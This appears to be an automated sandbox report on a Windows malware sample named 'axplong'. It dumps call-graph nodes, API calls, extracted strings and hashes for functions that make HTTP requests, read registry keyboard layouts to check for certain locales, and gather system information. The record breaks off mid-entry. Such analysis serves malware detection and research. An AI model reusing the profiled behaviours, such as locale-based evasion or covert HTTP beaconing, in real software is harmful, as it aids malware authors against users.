402f98 __Cnd_broadcast 12982->12984 12983->12984 12985 41c19a 10 API calls 12984->12985 12984->12988 12986 402ffc 12985->12986 12987 41c5dc GetSystemTimePreciseAsFileTime 12986->12987 12998 403040 shared_ptr __Mtx_unlock 12987->12998 12988->12960 12989 403185 12990 41c19a 10 API calls 12989->12990 12991 40318b 12990->12991 12992 41c19a 10 API calls 12991->12992 12993 403191 12992->12993 12994 41c19a 10 API calls 12993->12994 13000 403153 __Mtx_unlock 12994->13000 12995 403167 12995->12960 12996 41c19a 10 API calls 12997 40319d 12996->12997 12998->12989 12998->12991 12998->12995 12999 41c5dc GetSystemTimePreciseAsFileTime 12998->12999 13001 40311f 12999->13001 13000->12995 13000->12996 13001->12989 13001->12993 13001->13000 13003 41bc7c 13001->13003 13006 41baa2 13003->13006 13005 41bc8c 13005->13001 13007 41bacc 13006->13007 13008 41ce9b _xtime_get GetSystemTimePreciseAsFileTime 13007->13008 13011 41bad4 __Xtime_diff_to_millis2 13007->13011 13009 41baff __Xtime_diff_to_millis2 13008->13009 13010 41ce9b _xtime_get GetSystemTimePreciseAsFileTime 13009->13010 13009->13011 13010->13011 13011->13005 13013 402bce 13012->13013 13019 41b777 13013->13019 13015 402c02 13016 402c09 13015->13016 13025 402c40 13015->13025 13016->12958 13018 402c18 std::_Throw_future_error 13020 41b784 13019->13020 13024 41b7a3 Concurrency::details::_Reschedule_chore 13019->13024 13028 41caa7 13020->13028 13022 41b794 13022->13024 13030 41b74e 13022->13030 13024->13015 13036 41b72b 13025->13036 13027 402c72 shared_ptr 13027->13018 13029 41cac2 CreateThreadpoolWork 13028->13029 13029->13022 13031 41b757 Concurrency::details::_Reschedule_chore 13030->13031 13034 41ccfc 13031->13034 13033 41b771 13033->13024 13035 41cd11 TpPostWork 13034->13035 13035->13033 13037 41b737 13036->13037 13038 41b747 13036->13038 13037->13038 13040 41c9a8 13037->13040 13038->13027 13041 41c9bd TpReleaseWork 13040->13041 13041->13038 13050 418700 13051 41875a __cftof 13050->13051 13057 419ae0 13051->13057 13053 418784 13055 41879c 13053->13055 13061 4043b0 13053->13061 13056 418809 std::_Throw_future_error 13058 419b15 13057->13058 13067 402ca0 13058->13067 13060 419b46 13060->13053 13062 41be0f InitOnceExecuteOnce 13061->13062 13063 4043ca 13062->13063 13064 4043d1 13063->13064 13065 436beb 9 API calls 13063->13065 13064->13056 13066 4043e4 13065->13066 13068 402cdd 13067->13068 13069 41be0f InitOnceExecuteOnce 13068->13069 13070 402d06 13069->13070 13071 402d48 13070->13071 13072 402d11 13070->13072 13076 41be27 13070->13076 13083 402400 13071->13083 13072->13060 13077 41be33 std::_Throw_future_error 13076->13077 13078 41bea3 13077->13078 13079 41be9a 13077->13079 13081 402aa0 10 API calls 13078->13081 13086 41bdaf 13079->13086 13082 41be9f 13081->13082 13082->13071 13104 41b506 13083->13104 13085 402432 13087 41cb61 InitOnceExecuteOnce 13086->13087 13088 41bdc7 13087->13088 13089 41bdce 13088->13089 13092 436beb 13088->13092 13089->13082 13091 41bdd7 13091->13082 13097 436bf7 13092->13097 13093 438aaf __fassign 4 API calls 13094 436c26 13093->13094 13095 436c43 13094->13095 13096 436c35 13094->13096 13099 4368bd 4 API calls 13095->13099 13098 436c99 9 API calls 13096->13098 13097->13093 13100 436c3f 13098->13100 13101 436c5d 13099->13101 13100->13091 13102 436c99 9 API calls 13101->13102 13103 436c71 __freea 13101->13103 13102->13103 13103->13091 13106 41b521 std::_Throw_future_error 13104->13106 13105 438aaf __fassign 4 API calls 13107 41b5cf 13105->13107 13106->13105 13108 41b588 __fassign 13106->13108 13108->13085 12455 436beb 12460 436bf7 12455->12460 12457 436c26 12458 436c43 12457->12458 12459 436c35 12457->12459 12475 4368bd 12458->12475 12461 436c99 9 API calls 12459->12461 12467 438aaf 12460->12467 12463 436c3f 12461->12463 12464 436c5d 12466 436c71 __freea 12464->12466 12478 436c99 12464->12478 12468 438ab4 __fassign 12467->12468 12471 438abf 12468->12471 12490 43d4f4 12468->12490 12487 43651d 12471->12487 12472 43d727 RtlAllocateHeap 12473 43d73a __dosmaperr 12472->12473 12474 438af2 __fassign 12472->12474 12473->12457 12474->12472 12474->12473 12509 43683a 12475->12509 12477 4368cf 12477->12464 12479 436cc4 __cftof 12478->12479 12485 436ca7 __cftof __dosmaperr 12478->12485 12480 436d06 CreateFileW 12479->12480 12486 436cea __cftof __dosmaperr 12479->12486 12481 436d2a 12480->12481 12482 436d38 12480->12482 12545 436e01 GetFileType 12481->12545 12559 436d77 12482->12559 12485->12466 12486->12466 12497 4363f7 12487->12497 12491 43d500 __fassign 12490->12491 12492 43651d __fassign 2 API calls 12491->12492 12493 43d55c __cftof __dosmaperr __fassign 12491->12493 12496 43d6ee __fassign 12492->12496 12493->12471 12494 43d727 RtlAllocateHeap 12495 43d73a __dosmaperr 12494->12495 12494->12496 12495->12471 12496->12494 12496->12495 12498 436405 __fassign 12497->12498 12499 436450 12498->12499 12502 43645b 12498->12502 12499->12474 12507 43a1c2 GetPEB 12502->12507 12504 436465 12505 43646a GetPEB 12504->12505 12506 43647a __fassign 12504->12506 12505->12506 12508 43a1dc __fassign 12507->12508 12508->12504 12510 436851 12509->12510 12511 43685a 12509->12511 12510->12477 12511->12510 12515 43b4bb 12511->12515 12516 436890 12515->12516 12517 43b4ce 12515->12517 12519 43b4e8 12516->12519 12517->12516 12523 43f46b 12517->12523 12520 43b510 12519->12520 12521 43b4fb 12519->12521 12520->12510 12521->12520 12528 43e571 12521->12528 12525 43f477 __fassign 12523->12525 12524 43f4c6 12524->12516 12525->12524 12526 438aaf __fassign 4 API calls 12525->12526 12527 43f4eb 12526->12527 12529 43e57b 12528->12529 12532 43e489 12529->12532 12531 43e581 12531->12520 12536 43e495 __freea __fassign 12532->12536 12533 43e4b6 12533->12531 12534 438aaf __fassign 4 API calls 12535 43e528 12534->12535 12537 43e564 12535->12537 12541 43a5ee 12535->12541 12536->12533 12536->12534 12537->12531 12542 43a611 12541->12542 12543 438aaf __fassign 4 API calls 12542->12543 12544 43a687 12543->12544 12546 436e3c 12545->12546 12558 436ed2 __dosmaperr 12545->12558 12547 436e56 __cftof 12546->12547 12581 437177 12546->12581 12549 436e75 GetFileInformationByHandle 12547->12549 12547->12558 12550 436e8b 12549->12550 12549->12558 12567 4370c9 12550->12567 12554 436ea8 12555 436f71 SystemTimeToTzSpecificLocalTime 12554->12555 12556 436ebb 12555->12556 12557 436f71 SystemTimeToTzSpecificLocalTime 12556->12557 12557->12558 12558->12486 12604 437314 12559->12604 12561 436d85 12562 436d8a __dosmaperr 12561->12562 12563 4370c9 4 API calls 12561->12563 12562->12486 12564 436da3 12563->12564 12565 437177 RtlAllocateHeap 12564->12565 12566 436dc2 12565->12566 12566->12486 12568 4370df _wcsrchr 12567->12568 12576 436e97 12568->12576 12585 43b9e4 12568->12585 12570 437123 12571 43b9e4 4 API calls 12570->12571 12570->12576 12572 437134 12571->12572 12573 43b9e4 4 API calls 12572->12573 12572->12576 12574 437145 12573->12574 12575 43b9e4 4 API calls 12574->12575 12574->12576 12575->12576 12577 436f71 12576->12577 12578 436f89 12577->12578 12579 436fa9 SystemTimeToTzSpecificLocalTime 12578->12579 12580 436f8f 12578->12580 12579->12580 12580->12554 12582 437190 12581->12582 12584 4371a4 __dosmaperr 12582->12584 12596 43b568 12582->12596 12584->12547 12586 43b9f2 12585->12586 12589 43b9f8 __cftof __dosmaperr 12586->12589 12590 43ba2d 12586->12590 12588 43ba28 12588->12570 12589->12570 12591 43ba57 12590->12591 12593 43ba3d __cftof __dosmaperr 12590->12593 12592 43683a __fassign 4 API calls 12591->12592 12591->12593 12595 43ba81 12592->12595 12593->12588 12594 43b9a5 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12594->12595 12595->12593 12595->12594 12597 43b592 __cftof 12596->12597 12599 43b5ae __dosmaperr __freea 12597->12599 12600 43d6ef 12597->12600 12599->12584 12603 43d6fc __fassign 12600->12603 12601 43d727 RtlAllocateHeap 12602 43d73a __dosmaperr 12601->12602 12601->12603 12602->12599 12603->12601 12603->12602 12605 437338 12604->12605 12607 43733e 12605->12607 12608 437036 12605->12608 12607->12561 12609 437042 __dosmaperr 12608->12609 12614 43b87b 12609->12614 12611 437068 12611->12607 12612 43705a __dosmaperr 12612->12611 12613 43b87b RtlAllocateHeap 12612->12613 12613->12611 12617 43b6de 12614->12617 12616 43b894 12616->12612 12618 43b6ee 12617->12618 12620 43b6f5 12618->12620 12621 441ef8 12618->12621 12620->12616 12624 441d22 12621->12624 12623 441f0f 12623->12620 12625 441d54 12624->12625 12627 441d40 __cftof __dosmaperr 12624->12627 12626 43b568 RtlAllocateHeap 12625->12626 12625->12627 12626->12627 12627->12623 13124 41b7e9 13125 41b6e5 11 API calls 13124->13125 13126 41b811 Concurrency::details::_Reschedule_chore 13125->13126 13127 41b836 13126->13127 13131 41cade 13126->13131 13129 41b648 11 API calls 13127->13129 13130 41b84e 13129->13130 13132 41cafc 13131->13132 13133 41caec TpCallbackUnloadDllOnCompletion 13131->13133 13132->13127 13133->13132 12628 43d6ef 12631 43d6fc __fassign 12628->12631 12629 43d727 RtlAllocateHeap 12630 43d73a __dosmaperr 12629->12630 12629->12631 12631->12629 12631->12630 12726 40e410 12727 40e435 12726->12727 12729 40e419 12726->12729 12729->12727 12730 40e270 12729->12730 12731 40e280 __dosmaperr 12730->12731 12736 438979 12731->12736 12733 40e435 12733->12729 12734 40e2bd std::_Xinvalid_argument 12734->12733 12735 40e270 4 API calls 12734->12735 12735->12734 12737 438994 12736->12737 12740 4386d7 12737->12740 12739 43899e 12739->12734 12741 4386e9 12740->12741 12742 43683a __fassign 4 API calls 12741->12742 12745 4386fe __cftof __dosmaperr 12741->12745 12744 43872e 12742->12744 12744->12745 12746 438925 12744->12746 12745->12739 12747 438962 12746->12747 12748 438932 12746->12748 12757 43d2e9 12747->12757 12751 438941 __fassign 12748->12751 12752 43d30d 12748->12752 12751->12744 12753 43683a __fassign 4 API calls 12752->12753 12754 43d32a 12753->12754 12756 43d33a 12754->12756 12761 43f07f 12754->12761 12756->12751 12758 43d2f4 12757->12758 12759 43b4bb __fassign 4 API calls 12758->12759 12760 43d304 12759->12760 12760->12751 12762 43683a __fassign 4 API calls 12761->12762 12763 43f09f __cftof __fassign __freea 12762->12763 12763->12756 12903 4086b0 12904 4086b6 12903->12904 12910 436659 12904->12910 12906 4086d6 12909 4086d0 12917 4365a2 12910->12917 12912 4086c3 12912->12906 12913 4366e7 12912->12913 12914 4366f3 12913->12914 12916 4366fd __cftof __dosmaperr 12914->12916 12929 436670 12914->12929 12916->12909 12918 4365ae 12917->12918 12920 4365b5 __cftof __dosmaperr 12918->12920 12921 43a783 12918->12921 12920->12912 12922 43a78f 12921->12922 12925 43a827 12922->12925 12924 43a7aa 12924->12920 12927 43a84a 12925->12927 12926 43d6ef RtlAllocateHeap 12928 43a890 __freea 12926->12928 12927->12926 12927->12927 12927->12928 12928->12924 12930 436692 12929->12930 12932 43667d __cftof __dosmaperr __freea 12929->12932 12930->12932 12933 439ef9 12930->12933 12932->12916 12934 439f11 12933->12934 12936 439f36 12933->12936 12934->12936 12937 4402f8 12934->12937 12936->12932 12938 440304 12937->12938 12940 44030c __cftof __dosmaperr 12938->12940 12941 4403ea 12938->12941 12940->12936 12942 440410 __cftof __dosmaperr 12941->12942 12943 44040c 12941->12943 12942->12940 12943->12942 12945 43fb7f 12943->12945 12946 43fbcc 12945->12946 12947 43683a __fassign 4 API calls 12946->12947 12951 43fbdb __cftof 12947->12951 12948 43d2e9 4 API calls 12948->12951 12949 43c4ea GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap __fassign 12949->12951 12950 43fe7b 12950->12942 12951->12948 12951->12949 12951->12950 13115 40dfd0 recv 13116 40e032 recv 13115->13116 13117 40e067 recv 13116->13117 13118 40e0a1 13117->13118 13119 40e1c3 13118->13119 13120 41c5dc GetSystemTimePreciseAsFileTime 13118->13120 13121 40e1fe 13120->13121 13122 41c19a 10 API calls 13121->13122 13123 40e268 13122->13123 13109 419310 13110 419325 13109->13110 13111 419363 13109->13111 13112 41d041 SleepConditionVariableCS 13110->13112 13113 41932f 13112->13113 13113->13111 13114 41cff7 RtlWakeAllConditionVariable 13113->13114 13114->13111 13045 436974 13046 43698c 13045->13046 13048 436982 13045->13048 13047 4368bd 4 API calls 13046->13047 13049 4369a6 __freea 13047->13049 13042 436559 13043 4363f7 __fassign 2 API calls 13042->13043 13044 43656a 13043->13044 12632 41b85e 12637 41b6e5 12632->12637 12634 41b886 12645 41b648 12634->12645 12636 41b89f 12638 41b6f1 Concurrency::details::_Reschedule_chore 12637->12638 12639 41b722 12638->12639 12655 41c5dc 12638->12655 12639->12634 12643 41b70c __Mtx_unlock 12644 402ad0 10 API calls 12643->12644 12644->12639 12646 41b654 Concurrency::details::_Reschedule_chore 12645->12646 12647 41c5dc GetSystemTimePreciseAsFileTime 12646->12647 12648 41b6ae 12646->12648 12649 41b669 12647->12649 12648->12636 12650 402ad0 10 API calls 12649->12650 12651 41b66f __Mtx_unlock 12650->12651 12652 402ad0 10 API calls 12651->12652 12653 41b68c __Cnd_broadcast 12652->12653 12653->12648 12654 402ad0 10 API calls 12653->12654 12654->12648 12663 41c382 12655->12663 12657 41b706 12658 402ad0 12657->12658 12659 402ada 12658->12659 12660 402adc 12658->12660 12659->12643 12680 41c19a 12660->12680 12664 41c3d8 12663->12664 12666 41c3aa 12663->12666 12664->12666 12669 41ce9b 12664->12669 12666->12657 12667 41c42d __Xtime_diff_to_millis2 12667->12666 12668 41ce9b _xtime_get GetSystemTimePreciseAsFileTime 12667->12668 12668->12667 12670 41ceaa 12669->12670 12672 41ceb7 __aulldvrm 12669->12672 12670->12672 12673 41ce74 12670->12673 12672->12667 12676 41cb1a 12673->12676 12677 41cb2b GetSystemTimePreciseAsFileTime 12676->12677 12679 41cb37 12676->12679 12677->12679 12679->12672 12681 41c1c2 12680->12681 12682 41c1a4 12680->12682 12681->12681 12682->12681 12684 41c1c7 12682->12684 12687 402aa0 12684->12687 12686 41c1de std::_Throw_future_error 12686->12682 12701 41be0f 12687->12701 12689 402abf 12689->12686 12690 438aaf __fassign 4 API calls 12691 436c26 12690->12691 12692 436c43 12691->12692 12693 436c35 12691->12693 12695 4368bd 4 API calls 12692->12695 12694 436c99 9 API calls 12693->12694 12697 436c3f 12694->12697 12698 436c5d 12695->12698 12696 402ab4 12696->12689 12696->12690 12697->12686 12699 436c99 9 API calls 12698->12699 12700 436c71 __freea 12698->12700 12699->12700 12700->12686 12704 41cb61 12701->12704 12705 41cb6f InitOnceExecuteOnce 12704->12705 12707 41be22 12704->12707 12705->12707 12707->12696

                                        Executed Functions

                                        Function 0040BD60 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 310networkfileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 773 40bd60-40bdac 774 40c1a1-40c1c6 call 417f30 773->774 775 40bdb2-40bdb6 773->775 781 40c1f4-40c20c 774->781 782 40c1c8-40c1d4 774->782 775->774 776 40bdbc-40bdc0 775->776 776->774 778 40bdc6-40be4f InternetOpenW InternetConnectA call 417870 call 405b20 776->778 806 40be51 778->806 807 40be53-40be6f HttpOpenRequestA 778->807 783 40c212-40c21e 781->783 784 40c158-40c170 781->784 786 40c1d6-40c1e4 782->786 787 40c1ea-40c1f1 call 41d593 782->787 788 40c224-40c232 783->788 789 40c14e-40c155 call 41d593 783->789 790 40c243-40c25f call 41cf21 784->790 791 40c176-40c182 784->791 786->787 793 40c26f-40c274 call 436b9a 786->793 787->781 788->793 796 40c234 788->796 789->784 797 40c188-40c196 791->797 798 40c239-40c240 call 41d593 791->798 796->789 797->793 805 40c19c 797->805 798->790 805->798 806->807 811 40bea0-40bf0f call 417870 call 405b20 call 417870 call 405b20 807->811 812 40be71-40be80 807->812 825 40bf11 811->825 826 40bf13-40bf29 HttpSendRequestA 811->826 814 40be82-40be90 812->814 815 40be96-40be9d call 41d593 812->815 814->815 815->811 825->826 827 40bf5a-40bf82 826->827 828 40bf2b-40bf3a 826->828 829 40bfb3-40bfd4 InternetReadFile 827->829 830 40bf84-40bf93 827->830 831 40bf50-40bf57 call 41d593 828->831 832 40bf3c-40bf4a 828->832 835 40bfda 829->835 833 40bf95-40bfa3 830->833 834 40bfa9-40bfb0 call 41d593 830->834 831->827 832->831 833->834 834->829 838 40bfe0-40c090 call 434180 835->838
                                        APIs
                                        • InternetOpenW.WININET(00458D70,00000000,00000000,00000000,00000000), ref: 0040BDED
                                        • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0040BE10
                                        • HttpOpenRequestA.WININET(?,00000000), ref: 0040BE5A
                                        • HttpSendRequestA.WININET(?,00000000), ref: 0040BF1B
                                        • InternetReadFile.WININET(?,?,000003FF,?), ref: 0040BFCD
                                        • InternetCloseHandle.WININET(?), ref: 0040C0A7
                                        • InternetCloseHandle.WININET(?), ref: 0040C0AF
                                        • InternetCloseHandle.WININET(?), ref: 0040C0B7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                                        • String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$d4F$invalid stoi argument$stoi argument out of range
                                        • API String ID: 688256393-730882920
                                        • Opcode ID: 8aec45c713e83a44e22dabb790db3cb993a813797a6a01f89f3add627827598d
                                        • Instruction ID: 289012fcf8e4f5595944bd5049a2d4a8f30090e1162425a6d8c26b55887b0ffa
                                        • Opcode Fuzzy Hash: 8aec45c713e83a44e22dabb790db3cb993a813797a6a01f89f3add627827598d
                                        • Instruction Fuzzy Hash: 44B1B5B1900118DBEB24DF28CD85BDE7B65EF45304F5042AEE509A72C2D7789AC4CF99
                                        Function 004146C0 Relevance: 37.0, APIs: 1, Strings: 22, Instructions: 2484COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequest
                                        • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range$-F
                                        • API String ID: 3545240790-3817773905
                                        • Opcode ID: 405bbb22dc7553561d93291daa0936dc0e8ecc5fcb8af65c9d77aa80f6a009cb
                                        • Instruction ID: 4b31f04aa640fc13bd3c06ba17ec7330dbbfb61a3897356022f48a215646ad67
                                        • Opcode Fuzzy Hash: 405bbb22dc7553561d93291daa0936dc0e8ecc5fcb8af65c9d77aa80f6a009cb
                                        • Instruction Fuzzy Hash: FF230371A001549BEB19DB28CD897DDBB769F82308F5081DDE008A72C6EB799BC4CF59
                                        Function 00405DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 928 405df0-405eee 934 405ef0-405efc 928->934 935 405f18-405f25 call 41cf21 928->935 936 405f0e-405f15 call 41d593 934->936 937 405efe-405f0c 934->937 936->935 937->936 939 405f26-4060ad call 436b9a call 41e080 call 417f30 * 5 RegOpenKeyExA 937->939 957 4060b3-406143 call 434020 939->957 958 406478-406481 939->958 988 406466-406472 957->988 989 406149-40614d 957->989 959 406483-40648e 958->959 960 4064ae-4064b7 958->960 962 406490-40649e 959->962 963 4064a4-4064ab call 41d593 959->963 964 4064e4-4064ed 960->964 965 4064b9-4064c4 960->965 962->963 969 40659e-4065a3 call 436b9a 962->969 963->960 967 40651a-406523 964->967 968 4064ef-4064fa 964->968 971 4064c6-4064d4 965->971 972 4064da-4064e1 call 41d593 965->972 976 406525-406530 967->976 977 40654c-406555 967->977 973 406510-406517 call 41d593 968->973 974 4064fc-40650a 968->974 971->969 971->972 972->964 973->967 974->969 974->973 983 406542-406549 call 41d593 976->983 984 406532-406540 976->984 985 406582-40659d call 41cf21 977->985 986 406557-406566 977->986 983->977 984->969 984->983 995 406578-40657f call 41d593 986->995 996 406568-406576 986->996 988->958 990 406460 989->990 991 406153-406187 RegEnumValueW 989->991 990->988 997 40644d-406454 991->997 998 40618d-4061ad 991->998 995->985 996->969 996->995 997->991 1005 40645a 997->1005 1004 4061b0-4061b9 998->1004 1004->1004 1006 4061bb-40624d call 417c50 call 418090 call 417870 * 2 call 405c60 1004->1006 1005->990 1006->997
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                        • API String ID: 0-3963862150
                                        • Opcode ID: fbf96d77b666fe6bb60ac682d469a90b1e636845e86edade9b909977b5ed6565
                                        • Instruction ID: 36b36f9da7ac3f99c78a8b8cb35e44fc3bfab4e5c5f19681395086ef98f74fd3
                                        • Opcode Fuzzy Hash: fbf96d77b666fe6bb60ac682d469a90b1e636845e86edade9b909977b5ed6565
                                        • Instruction Fuzzy Hash: 22E1AF71900218BBEB24DFA4CD89BDEB779AF04304F5042EAE409A7291D778ABC4CF55
                                        Function 00407D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1016 407d00-407d82 call 434020 1020 407d88-407db0 call 417870 call 405b20 1016->1020 1021 40827e-40829b call 41cf21 1016->1021 1028 407db2 1020->1028 1029 407db4-407dd6 call 417870 call 405b20 1020->1029 1028->1029 1034 407dd8 1029->1034 1035 407dda-407df3 1029->1035 1034->1035 1038 407e24-407e4f 1035->1038 1039 407df5-407e04 1035->1039 1040 407e80-407ea1 1038->1040 1041 407e51-407e60 1038->1041 1042 407e06-407e14 1039->1042 1043 407e1a-407e21 call 41d593 1039->1043 1046 407ea3-407ea5 GetNativeSystemInfo 1040->1046 1047 407ea7-407eac 1040->1047 1044 407e62-407e70 1041->1044 1045 407e76-407e7d call 41d593 1041->1045 1042->1043 1048 40829c call 436b9a 1042->1048 1043->1038 1044->1045 1044->1048 1045->1040 1053 407ead-407eb6 1046->1053 1047->1053 1054 4082a1-4082a6 call 436b9a 1048->1054 1057 407ed4-407ed7 1053->1057 1058 407eb8-407ebf 1053->1058 1059 407edd-407ee6 1057->1059 1060 40821f-408222 1057->1060 1062 407ec5-407ecf 1058->1062 1063 408279 1058->1063 1064 407ee8-407ef4 1059->1064 1065 407ef9-407efc 1059->1065 1060->1063 1066 408224-40822d 1060->1066 1068 408274 1062->1068 1063->1021 1064->1068 1069 407f02-407f09 1065->1069 1070 4081fc-4081fe 1065->1070 1071 408254-408257 1066->1071 1072 40822f-408233 1066->1072 1068->1063 1073 407fe9-4081e5 call 417870 call 405b20 call 417870 call 405b20 call 405c60 call 417870 call 405b20 call 405640 call 417870 call 405b20 call 417870 call 405b20 call 405c60 call 417870 call 405b20 call 405640 call 417870 call 405b20 call 417870 call 405b20 call 405c60 call 417870 call 405b20 call 405640 1069->1073 1074 407f0f-407f6b call 417870 call 405b20 call 417870 call 405b20 call 405c60 1069->1074 1079 408200-40820a 1070->1079 1080 40820c-40820f 1070->1080 1077 408265-408271 1071->1077 1078 408259-408263 1071->1078 1075 408235-40823a 1072->1075 1076 408248-408252 1072->1076 1116 4081eb-4081f4 1073->1116 1102 407f70-407f77 1074->1102 1075->1076 1083 40823c-408246 1075->1083 1076->1063 1077->1068 1078->1063 1079->1068 1080->1063 1081 408211-40821d 1080->1081 1081->1068 1083->1063 1104 407f79 1102->1104 1105 407f7b-407f9b call 438a81 1102->1105 1104->1105 1110 407fd2-407fd4 1105->1110 1111 407f9d-407fac 1105->1111 1115 407fda-407fe4 1110->1115 1110->1116 1113 407fc2-407fcf call 41d593 1111->1113 1114 407fae-407fbc 1111->1114 1113->1110 1114->1054 1114->1113 1115->1116 1116->1060 1120 4081f6 1116->1120 1120->1070
                                        APIs
                                        • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407EA3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
